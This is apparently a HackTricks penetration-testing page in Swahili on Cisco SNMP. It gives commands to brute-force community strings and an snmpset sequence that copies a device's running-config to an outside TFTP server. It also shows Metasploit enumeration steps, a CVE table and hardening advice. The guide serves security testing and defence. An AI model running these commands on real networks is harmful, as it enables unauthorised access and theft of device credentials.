Cisco SNMP

Reading time: 5 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Pentesting Cisco Networks

SNMP inafanya kazi juu ya UDP na bandari 161/UDP kwa ujumbe wa jumla na 162/UDP kwa ujumbe wa mtego. Protokali hii inategemea nyuzi za jamii, zinazofanya kazi kama "nywila" za maandiko zinazowezesha mawasiliano kati ya wakala wa SNMP na wasimamizi. Nyuzi hizi zinatambulisha kiwango cha ufikiaji, haswa kusoma tu (RO) au ruhusa za kusoma-kandika (RW).

Njia ya shambulio ya jadi—lakini bado yenye ufanisi sana—ni kuvunjavunja nyuzi za jamii ili kuinua kutoka kwa mtumiaji asiyeidhinishwa hadi msimamizi wa kifaa (RW jamii). Chombo cha vitendo kwa kazi hii ni onesixtyone:

bash
onesixtyone -c community_strings.txt -i targets.txt

Mchango mwingine wa haraka ni skripti ya Nmap NSE snmp-brute au moduli ya SNMP ya Hydra:

bash
nmap -sU -p161 --script snmp-brute --script-args brute.community=wordlist 10.0.0.0/24
hydra -P wordlist.txt -s 161 10.10.10.1 snmp

Kutolea nje usanidi kupitia SNMP (CISCO-CONFIG-COPY-MIB)

Ikiwa unapata RW community unaweza nakili usanidi unaotumika/usanidi wa kuanzisha kwenye seva ya TFTP/FTP bila ufikiaji wa CLI kwa kutumia CISCO-CONFIG-COPY-MIB (1.3.6.1.4.1.9.9.96). Njia mbili za kawaida ni:

  1. Nmap NSE – snmp-ios-config
bash
nmap -sU -p161 --script snmp-ios-config \
--script-args creds.snmp=private 192.168.66.1

Script inaratibu kiotomatiki operesheni ya nakala na kuchapisha usanidi kwenye stdout.

  1. Mfuatano wa mikono wa snmpset
bash
# Copy running-config (4) to a TFTP server (1) – random row id 1234
snmpset -v2c -c private 192.168.66.1 \
1.3.6.1.4.1.9.9.96.1.1.1.1.2.1234 i 1 \    # protocol = tftp
1.3.6.1.4.1.9.9.96.1.1.1.1.3.1234 i 4 \    # sourceFileType = runningConfig
1.3.6.1.4.1.9.9.96.1.1.1.1.4.1234 i 1 \    # destFileType   = networkFile
1.3.6.1.4.1.9.9.96.1.1.1.1.5.1234 a 10.10.14.8 \ # TFTP server IP
1.3.6.1.4.1.9.9.96.1.1.1.1.6.1234 s \"backup.cfg\" \\
1.3.6.1.4.1.9.9.96.1.1.1.1.14.1234 i 4       # rowStatus = createAndGo

Row identifiers ni moja tu; matumizi tena ndani ya dakika tano husababisha makosa ya inconsistentValue.

Mara faili likiwa kwenye seva yako ya TFTP unaweza kuchunguza akauti (enable secret, username <user> secret, nk.) au hata kusukuma mabadiliko ya usanidi kurudi kwenye kifaa.


Metasploit goodies

  • cisco_config_tftp – inashusha running-config/startup-config kupitia TFTP baada ya kutumia MIB hiyo hiyo.
  • snmp_enum – inakusanya taarifa za hesabu ya kifaa, VLANs, maelezo ya kiunganishi, ARP tables, nk.
bash
use auxiliary/scanner/snmp/snmp_enum
set RHOSTS 10.10.100.10
set COMMUNITY public
run

Uthibitisho wa hivi karibuni wa Cisco SNMP (2023 – 2025)

Kufuatilia taarifa za wauzaji ni muhimu ili kubaini fursa za zero-day-to-n-day ndani ya ushirikiano:

MwakaCVEKipengele kilichohusikaAthari
2025CVE-2025-20174SNMP subsystemPakiti iliyoundwa inasababisha DoS (reload) iliyothibitishwa kwenye IOS/IOS-XE (v1/v2c/v3).
2024CVE-2024-20373Usimamizi wa IPv4 ACLACLs extended zilizowekwa vibaya zinashindwa kimya, zikiruhusu upimaji wa SNMP usio na uthibitisho wakati jamii/katumia halali inajulikana.
2025(hakuna CVE bado)Kupita kwa vizuizi vya usanidi wa SNMPv3Mtumiaji halali wa v3 anaweza kupima kutoka anwani ambazo zinapaswa kukataliwa.

Uwezekano wa kutumia mara nyingi bado unategemea kumiliki nywila ya jamii au akidi za v3—sababu nyingine kwa nini kujaribu kwa nguvu bado kuna umuhimu.


Vidokezo vya Kuimarisha & Kugundua

  • Pandisha toleo lililosahihishwa la IOS/IOS-XE (angalia taarifa ya Cisco kwa CVE hapo juu).
  • Prefer SNMPv3 na authPriv (SHA-256/AES-256) badala ya v1/v2c.
snmp-server group SECURE v3 priv
snmp-server user monitor SECURE v3 auth sha <authpass> priv aes 256 <privpass>
  • Fungamanisha SNMP na VRF ya usimamizi na punguza kwa standard numbered IPv4 ACLs (ACLs zenye majina za extended ni hatari – CVE-2024-20373).
  • Zima RW communities; ikiwa inahitajika kwa operesheni, zipunguze kwa ACL na maoni: snmp-server community <string> RW 99 view SysView
  • Fuata:
  • Spike za UDP/161 au vyanzo visivyotarajiwa (sheria za SIEM).
  • Matukio ya CISCO-CONFIG-MAN-MIB::ccmHistoryEventConfigSource yanayoashiria mabadiliko ya usanidi ya nje ya bendi.
  • Wezesha SNMPv3 logging na snmp-server packetsize 1500 ili kupunguza njia fulani za DoS.

Marejeleo

  • Cisco: Jinsi ya Nakili Mipangilio Kwa na Kutoka kwa Vifaa vya Cisco Kwa Kutumia SNMP
  • Taarifa ya Usalama ya Cisco cisco-sa-snmp-uwBXfqww (CVE-2024-20373)

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks